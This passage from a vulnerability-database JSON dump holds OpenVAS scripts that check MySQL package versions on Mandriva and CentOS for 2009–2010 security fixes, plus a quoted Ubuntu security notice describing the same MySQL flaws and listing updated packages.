exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64mysql-devel\", rpm:\"lib64mysql-devel~5.1.42~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64mysql-static-devel\", rpm:\"lib64mysql-static-devel~5.1.42~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-02T10:54:08", "references": ["http://lists.mandriva.com/security-announce/2010-01/msg00052.php", "2010:011"], "pluginID": "830821", "description": "Check for the Version of mysql", "edition": 3, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-01-19T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "Mandriva Update for mysql MDVSA-2010:011 (mysql)", "type": "openvas", "naslFamily": "Mandrake Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4030", "CVE-2009-4028", "CVE-2008-4098", "CVE-2008-2079", "CVE-2009-4019"], "modified": "2017-12-26T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=830821", "id": "OPENVAS:830821", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for mysql MDVSA-2010:011 (mysql)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities has been found and corrected in mysql:\n\n mysqld in MySQL 5.0.x before 5.0.88 and 5.1.x before 5.1.41 does\n not (1) properly handle errors during execution of certain SELECT\n statements with subqueries, and does not (2) preserve certain\n null_value flags during execution of statements that use the\n GeomFromWKB function, which allows remote authenticated users to\n cause a denial of service (daemon crash) via a crafted statement\n (CVE-2009-4019).\n \n The vio_verify_callback function in viosslfactories.c in MySQL\n 5.0.x before 5.0.88 and 5.1.x before 5.1.41, when OpenSSL is used,\n accepts a value of zero for the depth of X.509 certificates, which\n allows man-in-the-middle attackers to spoof arbitrary SSL-based MySQL\n servers via a crafted certificate, as demonstrated by a certificate\n presented by a server linked against the yaSSL library (CVE-2009-4028).\n \n MySQL 5.1.x before 5.1.41 allows local users to bypass certain\n privilege checks by calling CREATE TABLE on a MyISAM table with\n modified (1) DATA DIRECTORY or (2) INDEX DIRECTORY arguments\n that are originally associated with pathnames without symlinks,\n and that can point to tables created at a future time at which a\n pathname is modified to contain a symlink to a subdirectory of the\n MySQL data home directory, related to incorrect calculation of the\n mysql_unpacked_real_data_home value. NOTE: this vulnerability exists\n because of an incomplete fix for CVE-2008-4098 and CVE-2008-2079\n (CVE-2009-4030).\n \n Packages for 2008.0 are provided for Corporate Desktop 2008.0\n customers.\n \n The updated packages have been patched to correct these\n issues. Additionally for 2009.0 and MES5 mysql has also been upgraded\n to the last stable 5.0 release (5.0.89).\";\n\ntag_affected = \"mysql on Mandriva Linux 2008.0,\n Mandriva Linux 2008.0/X86_64,\n Mandriva Linux 2009.0,\n Mandriva Linux 2009.0/X86_64,\n Mandriva Enterprise Server 5,\n Mandriva Enterprise Server 5/X86_64\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2010-01/msg00052.php\");\n script_id(830821);\n script_version(\"$Revision: 8245 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-26 07:29:59 +0100 (Tue, 26 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-01-19 08:58:46 +0100 (Tue, 19 Jan 2010)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"MDVSA\", value: \"2010:011\");\n script_cve_id(\"CVE-2009-4019\", \"CVE-2009-4028\", \"CVE-2008-4098\", \"CVE-2008-2079\", \"CVE-2009-4030\");\n script_name(\"Mandriva Update for mysql MDVSA-2010:011 (mysql)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of mysql\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2008.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libmysql15\", rpm:\"libmysql15~5.0.45~8.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libmysql-devel\", rpm:\"libmysql-devel~5.0.45~8.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libmysql-static-devel\", rpm:\"libmysql-static-devel~5.0.45~8.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql\", rpm:\"mysql~5.0.45~8.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-bench\", rpm:\"mysql-bench~5.0.45~8.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-client\", rpm:\"mysql-client~5.0.45~8.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-common\", rpm:\"mysql-common~5.0.45~8.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-max\", rpm:\"mysql-max~5.0.45~8.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-extra\", rpm:\"mysql-ndb-extra~5.0.45~8.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-management\", rpm:\"mysql-ndb-management~5.0.45~8.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-storage\", rpm:\"mysql-ndb-storage~5.0.45~8.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-tools\", rpm:\"mysql-ndb-tools~5.0.45~8.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64mysql15\", rpm:\"lib64mysql15~5.0.45~8.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64mysql-devel\", rpm:\"lib64mysql-devel~5.0.45~8.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64mysql-static-devel\", rpm:\"lib64mysql-static-devel~5.0.45~8.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_mes5\")\n{\n\n if ((res = isrpmvuln(pkg:\"libmysql15\", rpm:\"libmysql15~5.0.89~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libmysql-devel\", rpm:\"libmysql-devel~5.0.89~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libmysql-static-devel\", rpm:\"libmysql-static-devel~5.0.89~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql\", rpm:\"mysql~5.0.89~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-bench\", rpm:\"mysql-bench~5.0.89~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-client\", rpm:\"mysql-client~5.0.89~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-common\", rpm:\"mysql-common~5.0.89~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-doc\", rpm:\"mysql-doc~5.0.89~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-max\", rpm:\"mysql-max~5.0.89~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-extra\", rpm:\"mysql-ndb-extra~5.0.89~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-management\", rpm:\"mysql-ndb-management~5.0.89~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-storage\", rpm:\"mysql-ndb-storage~5.0.89~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-tools\", rpm:\"mysql-ndb-tools~5.0.89~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64mysql15\", rpm:\"lib64mysql15~5.0.89~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64mysql-devel\", rpm:\"lib64mysql-devel~5.0.89~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64mysql-static-devel\", rpm:\"lib64mysql-static-devel~5.0.89~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2009.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libmysql15\", rpm:\"libmysql15~5.0.89~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libmysql-devel\", rpm:\"libmysql-devel~5.0.89~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libmysql-static-devel\", rpm:\"libmysql-static-devel~5.0.89~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql\", rpm:\"mysql~5.0.89~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-bench\", rpm:\"mysql-bench~5.0.89~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-client\", rpm:\"mysql-client~5.0.89~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-common\", rpm:\"mysql-common~5.0.89~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-doc\", rpm:\"mysql-doc~5.0.89~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-max\", rpm:\"mysql-max~5.0.89~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-extra\", rpm:\"mysql-ndb-extra~5.0.89~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-management\", rpm:\"mysql-ndb-management~5.0.89~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-storage\", rpm:\"mysql-ndb-storage~5.0.89~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-tools\", rpm:\"mysql-ndb-tools~5.0.89~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64mysql15\", rpm:\"lib64mysql15~5.0.89~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64mysql-devel\", rpm:\"lib64mysql-devel~5.0.89~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64mysql-static-devel\", rpm:\"lib64mysql-static-devel~5.0.89~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-02T00:04:58", "references": ["http://lists.centos.org/pipermail/centos-announce/2010-March/016527.html", "2010:0109"], "pluginID": "1361412562310880613", "description": "Check for the Version of mysql", "edition": 4, "reporter": "Copyright (c) 2011 Greenbone Networks GmbH", "published": "2011-08-09T00:00:00", "title": "CentOS Update for mysql CESA-2010:0109 centos5 i386", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4030", "CVE-2009-4028", "CVE-2008-4098", "CVE-2008-2079", "CVE-2009-4019"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310880613", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880613", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for mysql CESA-2010:0109 centos5 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"MySQL is a multi-user, multi-threaded SQL database server. It consists of\n the MySQL server daemon (mysqld) and many client programs and libraries.\n\n It was discovered that the MySQL client ignored certain SSL certificate\n verification errors when connecting to servers. A man-in-the-middle\n attacker could use this flaw to trick MySQL clients into connecting to a\n spoofed MySQL server. (CVE-2009-4028)\n \n Note: This fix may uncover previously hidden SSL configuration issues, such\n as incorrect CA certificates being used by clients or expired server\n certificates. This update should be carefully tested in deployments where\n SSL connections are used.\n \n A flaw was found in the way MySQL handled SELECT statements with subqueries\n in the WHERE clause, that assigned results to a user variable. A remote,\n authenticated attacker could use this flaw to crash the MySQL server daemon\n (mysqld). This issue only caused a temporary denial of service, as the\n MySQL daemon was automatically restarted after the crash. (CVE-2009-4019)\n \n When the "datadir" option was configured with a relative path, MySQL did\n not properly check paths used as arguments for the DATA DIRECTORY and INDEX\n DIRECTORY directives. An authenticated attacker could use this flaw to\n bypass the restriction preventing the use of subdirectories of the MySQL\n data directory being used as DATA DIRECTORY and INDEX DIRECTORY paths.\n (CVE-2009-4030)\n \n Note: Due to the security risks and previous security issues related to the\n use of the DATA DIRECTORY and INDEX DIRECTORY directives, users not\n depending on this feature should consider disabling it by adding\n "symbolic-links=0" to the "[mysqld]" section of the "my.cnf" configuration\n file. In this update, an example of such a configuration was added to the\n default "my.cnf" file.\n \n All MySQL users are advised to upgrade to these updated packages, which\n contain backported patches to resolve these issues. After installing this\n update, the MySQL server daemon (mysqld) will be restarted automatically.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"mysql on CentOS 5\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2010-March/016527.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880613\");\n script_version(\"$Revision: 9371 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:55:06 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"CESA\", value: \"2010:0109\");\n script_cve_id(\"CVE-2009-4019\", \"CVE-2009-4028\", \"CVE-2009-4030\", \"CVE-2008-2079\", \"CVE-2008-4098\");\n script_name(\"CentOS Update for mysql CESA-2010:0109 centos5 i386\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of mysql\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"mysql\", rpm:\"mysql~5.0.77~4.el5_4.2\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-bench\", rpm:\"mysql-bench~5.0.77~4.el5_4.2\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-devel\", rpm:\"mysql-devel~5.0.77~4.el5_4.2\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-server\", rpm:\"mysql-server~5.0.77~4.el5_4.2\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-test\", rpm:\"mysql-test~5.0.77~4.el5_4.2\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "seebug": [{"lastseen": "2017-11-19T18:15:11", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments_done": [], "references": [], "description": "No description provided by source.", "reporter": "Root", "published": "2010-02-13T00:00:00", "title": "MySQL vulnerabilities", "type": "seebug", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2008-4098", "CVE-2008-4456", "CVE-2008-7247", "CVE-2009-2446", "CVE-2009-4019", "CVE-2009-4030", "CVE-2009-4484"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2010-02-13T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-19118", "id": "SSV:19118", "sourceData": "\n ===========================================================\r\nUbuntu Security Notice USN-897-1 February 10, 2010\r\nmysql-dfsg-5.0, mysql-dfsg-5.1 vulnerabilities\r\nCVE-2008-4098, CVE-2008-4456, CVE-2008-7247, CVE-2009-2446,\r\nCVE-2009-4019, CVE-2009-4030, CVE-2009-4484\r\n===========================================================\r\n\r\nA security issue affects the following Ubuntu releases:\r\n\r\nUbuntu 6.06 LTS\r\nUbuntu 8.04 LTS\r\nUbuntu 8.10\r\nUbuntu 9.04\r\nUbuntu 9.10\r\n\r\nThis advisory also applies to the corresponding versions of\r\nKubuntu, Edubuntu, and Xubuntu.\r\n\r\nThe problem can be corrected by upgrading your system to the\r\nfollowing package versions:\r\n\r\nUbuntu 6.06 LTS:\r\n mysql-server-5.0 5.0.22-0ubuntu6.06.12\r\n\r\nUbuntu 8.04 LTS:\r\n mysql-server-5.0 5.0.51a-3ubuntu5.5\r\n\r\nUbuntu 8.10:\r\n mysql-server-5.0 5.0.67-0ubuntu6.1\r\n\r\nUbuntu 9.04:\r\n mysql-server-5.0 5.1.30really5.0.75-0ubuntu10.3\r\n\r\nUbuntu 9.10:\r\n mysql-server-5.1 5.1.37-1ubuntu5.1\r\n\r\nIn general, a standard system upgrade is sufficient to effect the\r\nnecessary changes.\r\n\r\nDetails follow:\r\n\r\nIt was discovered that MySQL could be made to overwrite existing table\r\nfiles in the data directory. An authenticated user could use the DATA\r\nDIRECTORY and INDEX DIRECTORY options to possibly bypass privilege checks.\r\nThis update alters table creation behaviour by disallowing the use of the\r\nMySQL data directory in DATA DIRECTORY and INDEX DIRECTORY options. This\r\nissue only affected Ubuntu 8.10. (CVE-2008-4098) \r\n\r\nIt was discovered that MySQL contained a cross-site scripting vulnerability\r\nin the command-line client when the --html option is enabled. An attacker\r\ncould place arbitrary web script or html in a database cell, which would\r\nthen get placed in the html document output by the command-line tool. This\r\nissue only affected Ubuntu 6.06 LTS, 8.04 LTS, 8.10 and 9.04.\r\n(CVE-2008-4456)\r\n\r\nIt was discovered that MySQL could be made to overwrite existing table\r\nfiles in the data directory. An authenticated user could use symlinks\r\ncombined with the DATA DIRECTORY and INDEX DIRECTORY options to possibly\r\nbypass privilege checks. This issue only affected Ubuntu 9.10.\r\n(CVE-2008-7247)\r\n\r\nIt was discovered that MySQL contained multiple format string flaws when\r\nlogging database creation and deletion. An authenticated user could use\r\nspecially crafted database names to make MySQL crash, causing a denial of\r\nservice. This issue only affected Ubuntu 6.06 LTS, 8.04 LTS, 8.10 and 9.04.\r\n(CVE-2009-2446)\r\n\r\nIt was discovered that MySQL incorrectly handled errors when performing\r\ncertain SELECT statements, and did not preserve correct flags when\r\nperforming statements that use the GeomFromWKB function. An authenticated\r\nuser could exploit this to make MySQL crash, causing a denial of service.\r\n(CVE-2009-4019)\r\n\r\nIt was discovered that MySQL incorrectly checked symlinks when using the\r\nDATA DIRECTORY and INDEX DIRECTORY options. A local user could use symlinks\r\nto create tables that pointed to tables known to be created at a later\r\ntime, bypassing access restrictions. (CVE-2009-4030)\r\n\r\nIt was discovered that MySQL contained a buffer overflow when parsing\r\nssl certificates. A remote attacker could send crafted requests and cause a\r\ndenial of service or possibly execute arbitrary code. This issue did not\r\naffect Ubuntu 6.06 LTS and the default compiler options for affected\r\nreleases should reduce the vulnerability to a denial of service. In the\r\ndefault installation, attackers would also be isolated by the AppArmor\r\nMySQL profile. (CVE-2009-4484)\r\n\r\n\r\nUpdated packages for Ubuntu 6.06 LTS:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.22 \\\r\n-0ubuntu6.06.12.diff.gz Size/MD5: 167876 00d09bda2a9e6a8d09bb9b871987049f\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.22 \\\r\n-0ubuntu6.06.12.dsc Size/MD5: 1125 a7e5e72f375a937a016791eb938b0c43\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.22 \\\r\n.orig.tar.gz Size/MD5: 18446645 2b8f36364373461190126817ec872031\r\n\r\n Architecture independent packages:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-client_5.0.22-0 \\\r\nubuntu6.06.12_all.deb Size/MD5: 39254 29bd1bf7821777bb0ff45362efaae9c1\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-common_5.0.22-0 \\\r\nubuntu6.06.12_all.deb Size/MD5: 41802 55fc2a62d0f6c1cb6d6d3ee486bf1dbe\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-server_5.0.22-0 \\\r\nubuntu6.06.12_all.deb Size/MD5: 39260 9d590dbd861ae98c88273f254eeac160\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_ \\\r\n5.0.22-0ubuntu6.06.12_amd64.deb Size/MD5: 6730446 10c7d0a9787128bbbe1eb26675a7d657\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5 \\\r\n.0.22-0ubuntu6.06.12_amd64.deb Size/MD5: 1424244 b446087d5d5d6347cfbb18c702a8a58b\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0. \\\r\n22-0ubuntu6.06.12_amd64.deb Size/MD5: 6898198 2cc1f733f990a7952a940a48a39e43e4\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0. \\\r\n22-0ubuntu6.06.12_amd64.deb Size/MD5: 22493888 dda28be78a9efd6a58c3cd5a05271570\r\n\r\n i386 architecture (x86 compatible Intel/AMD):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_ \\\r\n5.0.22-0ubuntu6.06.12_i386.deb Size/MD5: 6143164 fa552022904e46d3d7d06bda09b6ed1b\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5 \\\r\n.0.22-0ubuntu6.06.12_i386.deb Size/MD5: 1384680 1ac135a8d8582014b642e07f0e43e7a2\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0. \\\r\n22-0ubuntu6.06.12_i386.deb Size/MD5: 6279786 